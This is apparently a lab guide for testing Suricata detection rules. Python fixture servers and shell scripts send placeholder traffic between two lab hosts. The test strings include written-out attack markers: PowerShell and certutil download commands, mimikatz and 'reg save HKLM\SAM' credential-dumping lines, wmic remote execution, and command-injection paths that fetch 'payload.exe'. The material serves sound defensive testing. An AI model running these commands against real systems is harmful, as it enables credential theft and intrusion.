编写powershell、certutil、regsvr32请求及下载的suricata规则-测试(9001188-9001199、9001000)
1.主机A开启服务
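from __future__ import annotations

from http.server import BaseHTTPRequestHandler, HTTPServer

# Fixture server for the Suricata rule tests (9001188-9001199, 9001000).
# Every route answers with a small placeholder body whose headers/markers
# are what the rule under test inspects.
# 0.0.0.0 listens on every interface of host A; port 80 needs the usual
# privilege to bind.
HOST = "0.0.0.0"
PORT = 80

# Route table: exact request path (query string included) ->
# (body, Content-Type, attachment filename). A filename of None means no
# Content-Disposition header is sent for that route.
# NOTE: the /template body embeds the lab address literally; it is not
# derived from HOST.
ROUTES = {
    "/lnk": (b"dummy", "application/octet-stream", "test.lnk"),
    "/hta": (b"<html><script>msgbox(1)</script></html>", "application/hta", "test.hta"),
    "/iso": (b"ISOIMAGE", "application/x-iso9660-image", "test.iso"),
    "/one": (b"ONENOTE", "application/octet-stream", "test.one"),
    "/js": (b"alert(1);", "application/javascript", "test.js"),
    "/pdf_active": (
        b"%PDF-1.7\n/OpenAction /JavaScript /Launch /EmbeddedFile /XFA\n",
        "application/pdf",
        None,
    ),
    "/pdf_uri": (
        b"%PDF-1.7\n/URI(http://evil.test/) /SubmitForm\n",
        "application/pdf",
        None,
    ),
    "/docm": (
        b"PK\x03\x04 macro",
        "application/vnd.ms-word.document.macroEnabled.12",
        "test.docm",
    ),
    "/macro": (
        b"AutoOpen\nCreateObject(\"WScript.Shell\")\ncmd /c calc.exe\n",
        "application/octet-stream",
        None,
    ),
    "/template": (
        b'attachedTemplate INCLUDEPICTURE http://10.66.66.1/x TargetMode="External"',
        "application/octet-stream",
        None,
    ),
    "/follina": (
        b'ms-msdt: PCWDiagnostic IT_BrowseForFile search-ms:',
        "text/html",
        None,
    ),
    "/chm": (b"dummy", "application/octet-stream", "test.chm"),
}
# Reply for any path not listed in ROUTES (and for every POST).
DEFAULT_REPLY = (b"OK\n", "text/plain", None)


class Handler(BaseHTTPRequestHandler):
    """Serve the placeholder artifacts in ROUTES; anything else gets "OK"."""

    def log_message(self, fmt, *args):
        """Silence the default per-request log line on stderr."""
        return

    def _reply(self, body: bytes, ctype: str, filename: str | None = None) -> None:
        """Write a 200 response carrying *body*.

        Header order is fixed (Content-Disposition, Content-Type,
        Content-Length) so every request shows the rules the same layout.
        *filename*, when given, is sent as an attachment disposition.
        """
        self.send_response(200)
        if filename is not None:
            self.send_header("Content-Disposition", f"attachment; filename={filename}")
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def _content_length(self) -> int:
        """Return the declared request body length, or 0 if absent or unusable.

        A non-numeric Content-Length would otherwise raise ValueError out of
        do_POST and drop the connection without a response; a negative one
        would make rfile.read() block until the client closes.
        """
        try:
            return max(0, int(self.headers.get("Content-Length", "0")))
        except ValueError:
            return 0

    def do_GET(self) -> None:
        """Answer with the canned artifact for self.path (exact match)."""
        body, ctype, filename = ROUTES.get(self.path, DEFAULT_REPLY)
        self._reply(body, ctype, filename)

    def do_POST(self) -> None:
        """Drain the request body and answer "OK"."""
        length = self._content_length()
        if length > 0:
            self.rfile.read(length)
        body, ctype, filename = DEFAULT_REPLY
        self._reply(body, ctype, filename)


def main() -> None:
    """Run the fixture server on HOST:PORT until interrupted."""
    server = HTTPServer((HOST, PORT), Handler)
    try:
        server.serve_forever()
    finally:
        server.server_close()


# Guarded so importing the module (e.g. for tests) does not bind port 80.
if __name__ == "__main__":
    main()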
2.主机B发送测试请求
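#!/bin/sh
# Host B: trigger rules 9001188-9001199 and 9001000 against the fixture
# server on host A. Each request carries the marker the rule inspects and
# host A answers with small placeholder bodies.
#
# usage: ./send_tests.sh [TARGET] [TIMEOUT]
#   TARGET   address of host A (default 10.66.66.1, the lab value)
#   TIMEOUT  per-request curl --max-time in seconds (default 5)
set -u
TARGET="${1:-10.66.66.1}"
TIMEOUT="${2:-5}"

# curl with a hard time cap so an unreachable or silent target cannot stall
# the whole run.
req() {
    curl --max-time "$TIMEOUT" "$@"
}

# header_probe 'Name: value' -- GET /ok twice with the given extra header
# (sent twice presumably because those rules carry a threshold; confirm
# against the rule file).
header_probe() {
    for i in 1 2; do
        req -A "Mozilla/5.0" -H "$1" "http://${TARGET}/ok"
        echo
    done
}

# fetch_twice NAME -- download /NAME twice; -O keeps NAME as the local file.
fetch_twice() {
    for i in 1 2; do
        req -O "http://${TARGET}/$1"
    done
}

# 1. test 9001188
header_probe "X-Test: powershell Invoke-WebRequest http://${TARGET}/a.ps1 ; Net.WebClient DownloadString"
# 2. test 9001189
header_probe "X-Test: certutil -urlcache -f http://${TARGET}/p.exe p.exe"
# 3. test 9001190
header_probe "X-Test: mshta http://${TARGET}/test.hta"
# 4. test 9001191
fetch_twice lnk
fetch_twice hta
# 5. test 9001192
fetch_twice iso
# 6. test 9001193
fetch_twice js
# 7. test 9001194
req "http://${TARGET}/pdf_active" -o test_active.pdf
# 8. test 9001195
req "http://${TARGET}/pdf_uri" -o test_uri.pdf
# 9. test 9001196
req -O "http://${TARGET}/docm"
# 10. test 9001197
req "http://${TARGET}/macro" -o macro.bin
# 11. test 9001198
req "http://${TARGET}/template" -o template.bin
# 12. test 9001199
req "http://${TARGET}/follina" -o follina.html
# 13. test 9001000
req -O "http://${TARGET}/chm"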
3.主机A开启监听(9001003-9001019)
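from __future__ import annotations

import socket
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Listener side for rules 9001003-9001019. 0.0.0.0 binds every interface
# of host A; 80 and the RAW_PORTS below are privileged ports.
HOST = "0.0.0.0"
HTTP_PORT = 80
# 3389/445/5985/5986: the rules only need the TCP payload to reach the
# wire, so a plain accept-and-acknowledge listener is enough here.
RAW_PORTS = [3389, 445, 5985, 5986]
# Sent back for every chunk received on a raw port.
RAW_ACK = b"OK\r\n"


def raw_listener(port: int) -> None:
    """Accept TCP connections on HOST:*port* forever, one thread per client."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((HOST, port))
        srv.listen(128)
        print(f"[+] listening tcp/{port}")
        while True:
            conn, addr = srv.accept()
            threading.Thread(
                target=handle_raw, args=(conn, addr, port), daemon=True
            ).start()


def handle_raw(conn: socket.socket, addr, port: int) -> None:
    """Acknowledge each chunk read from *conn* until the peer closes.

    *addr* and *port* are part of the thread signature but unused. Any
    socket error (peer reset, broken pipe) ends the exchange quietly
    instead of dumping a traceback from the daemon thread; the socket is
    closed in every case.
    """
    with conn:
        try:
            while True:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                conn.sendall(RAW_ACK)
        except OSError:
            pass  # best-effort fixture: nothing to recover once the peer is gone


def select_reply(path: str) -> tuple[bytes, str]:
    """Map a request path to (body, Content-Type) for the rule being exercised.

    Substring/prefix matching, first hit wins, so the order matters:
    "/a;whoami" must reach the 9001014 branch before anything else.
    """
    if "whoami" in path or "systeminfo" in path:
        # 9001014: command-execution output
        return b"Windows IP Configuration\r\nwhoami\r\nsysteminfo\r\n", "text/plain"
    if "a.exe" in path or "payload.exe" in path:
        # 9001015: PE
        return b"MZTESTPAYLOAD", "application/octet-stream"
    if "a.elf" in path:
        # 9001016: ELF / shell
        return b"\x7fELFTESTPAYLOAD", "application/octet-stream"
    if "a.sh" in path:
        return b"#!/bin/bash\necho test\n", "text/plain"
    if path.startswith("/electron"):
        # 9001018: Electron / WebView bridge + downloader markers
        body = (
            b"shell.openExternal('x');"
            b"child_process.exec('powershell -nop -w hidden');"
            b"window.chrome.webview.postMessage('ok');"
        )
        return body, "text/html"
    if path.startswith("/archive"):
        # 9001019: archive lure; body carries a PK signature plus suspicious extensions
        return b"PK\x03\x04aaaaevil.lnkbbbbdropper.jsccccpayload.hta", "application/zip"
    return b"OK\n", "text/plain"


class Handler(BaseHTTPRequestHandler):
    """HTTP side of the fixture: canned bodies chosen by select_reply()."""

    def log_message(self, fmt, *args):
        """Silence the default per-request log line on stderr."""
        return

    def _reply(self, body: bytes, ctype: str) -> None:
        """Write a 200 response with *body*; Connection: close ends the socket."""
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.send_header("Connection", "close")
        self.end_headers()
        self.wfile.write(body)

    def _content_length(self) -> int:
        """Return the declared request body length, or 0 if absent or unusable.

        A non-numeric Content-Length would otherwise raise ValueError out of
        do_POST and drop the connection without a response; a negative one
        would make rfile.read() block until the client closes.
        """
        try:
            return max(0, int(self.headers.get("Content-Length", "0")))
        except ValueError:
            return 0

    def do_GET(self) -> None:
        """Answer with the body select_reply() picks for self.path."""
        body, ctype = select_reply(self.path)
        self._reply(body, ctype)

    def do_POST(self) -> None:
        """Drain the request body and answer "OK"."""
        length = self._content_length()
        if length > 0:
            self.rfile.read(length)
        self._reply(b"OK\n", "text/plain")


def main() -> None:
    """Start the raw listeners in daemon threads, then serve HTTP until interrupted."""
    for port in RAW_PORTS:
        threading.Thread(target=raw_listener, args=(port,), daemon=True).start()
    print(f"[+] listening tcp/{HTTP_PORT}")
    server = HTTPServer((HOST, HTTP_PORT), Handler)
    try:
        server.serve_forever()
    finally:
        server.server_close()


# Guarded so importing the module (e.g. for tests) does not bind any port.
if __name__ == "__main__":
    main()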
4.主机B发送测试请求
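#!/bin/sh
# Host B: drive rules 9001003-9001019 against host A, which runs the raw
# TCP listeners (3389/445/5985/5986) and the HTTP fixture on port 80.
# The payloads are the rule markers themselves; host A only answers "OK".
#
# usage: ./send_tests_2.sh [TARGET] [TIMEOUT]
#   TARGET   address of host A (default 10.66.66.1, the lab value)
#   TIMEOUT  seconds for nc -w and curl --max-time (default 3)
set -u
TARGET="${1:-10.66.66.1}"
TIMEOUT="${2:-3}"

# send_raw PORT -- stdin is written to TARGET:PORT.
# The raw listeners on host A never close the connection themselves, so
# without -w some nc builds (e.g. OpenBSD nc without -N) wait forever after
# stdin hits EOF. On OpenBSD/traditional nc, -w also bounds idle reads; on
# nmap's ncat it is only the connect timeout, so add -i there if needed.
send_raw() {
    nc -w "$TIMEOUT" "$TARGET" "$1"
}

# http_get_hdr 'Name: value' -- GET / on port 80 with one extra header.
# The header goes through %s, so a backslash written once (HKLM\SAM) reaches
# the wire once. Connection: close makes host A hang up, so nc exits on its own.
http_get_hdr() {
    printf 'GET / HTTP/1.1\r\nHost: %s\r\n%s\r\nConnection: close\r\n\r\n' "$TARGET" "$1" | send_raw 80
}

# http_get_path PATH -- GET PATH on port 80; PATH is sent verbatim.
http_get_path() {
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$1" "$TARGET" | send_raw 80
}

# 1. test 9001006
for i in 1 2 3 4 5; do
    printf 'Cookie: mstshash=administrator\r\n' | send_raw 3389
    sleep 1
done
# 2. test 9001007
for i in 1 2 3; do
    printf 'ADMIN$ IPC$ C$' | send_raw 445
    sleep 1
done
# 3. test 9001008
for i in 1 2; do
    printf 'svcctl psexec remcom atsvc winreg' | send_raw 445
    sleep 1
done
# 4. test 9001009
# Content-Length is derived from the body: the hand-written 60 overstated the
# 57-byte body, which an HTTP-aware parser may treat as a truncated request.
wsman_body='ShellId=1&rsp:CommandLine=whoami&wsmid:Command=powershell'
for i in 1 2; do
    printf 'POST /wsman HTTP/1.1\r\nHost: %s\r\nContent-Length: %d\r\n\r\n%s' \
        "$TARGET" "${#wsman_body}" "$wsman_body" | send_raw 5985
    sleep 1
done
# 5. test 9001010
for i in 1 2; do
    printf 'wmic /node:%s process call create "cmd.exe /c whoami" Win32_Process Create(' "$TARGET" | send_raw 445
    sleep 1
done
# 6. test 9001003
http_get_hdr 'X-Test: mimikatz sekurlsa::logonpasswords lsass.dmp'
# 7. test 9001004
http_get_hdr 'X-Test: reg save HKLM\SAM sam.save & reg save HKLM\SYSTEM system.save & vssadmin create shadow'
# 8. test 9001005
for i in 1 2; do
    http_get_hdr 'X-Test: whoami /all && systeminfo && ipconfig /all && nltest /dclist'
    sleep 1
done
# 9. test 9001011 -- same request as test 8; presumably 9001005 and 9001011
# inspect the same content, confirm against the rule file.
for i in 1 2; do
    http_get_hdr 'X-Test: whoami /all && systeminfo && ipconfig /all && nltest /dclist'
    sleep 1
done
# 10. test 9001012
http_get_hdr 'X-Test: CurrentVersion\Run RunOnce Startup\ Image File Execution Options Userinit'
# 11. test 9001014
http_get_path '/a;whoami'
# 12. test 9001015
http_get_path '/a;curl http://x/payload.exe'
# 13. test 9001016
http_get_path '/a;curl http://x/a.elf'
# 14. test 9001017
for i in 1 2 3 4 5; do
    http_get_path '/checkin'
    sleep 1
done
# 15. test 9001018
curl --max-time "$TIMEOUT" "http://${TARGET}/electron" -o /tmp/electron.txt
# 16. test 9001019
curl --max-time "$TIMEOUT" "http://${TARGET}/archive" -o /tmp/archive.zip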
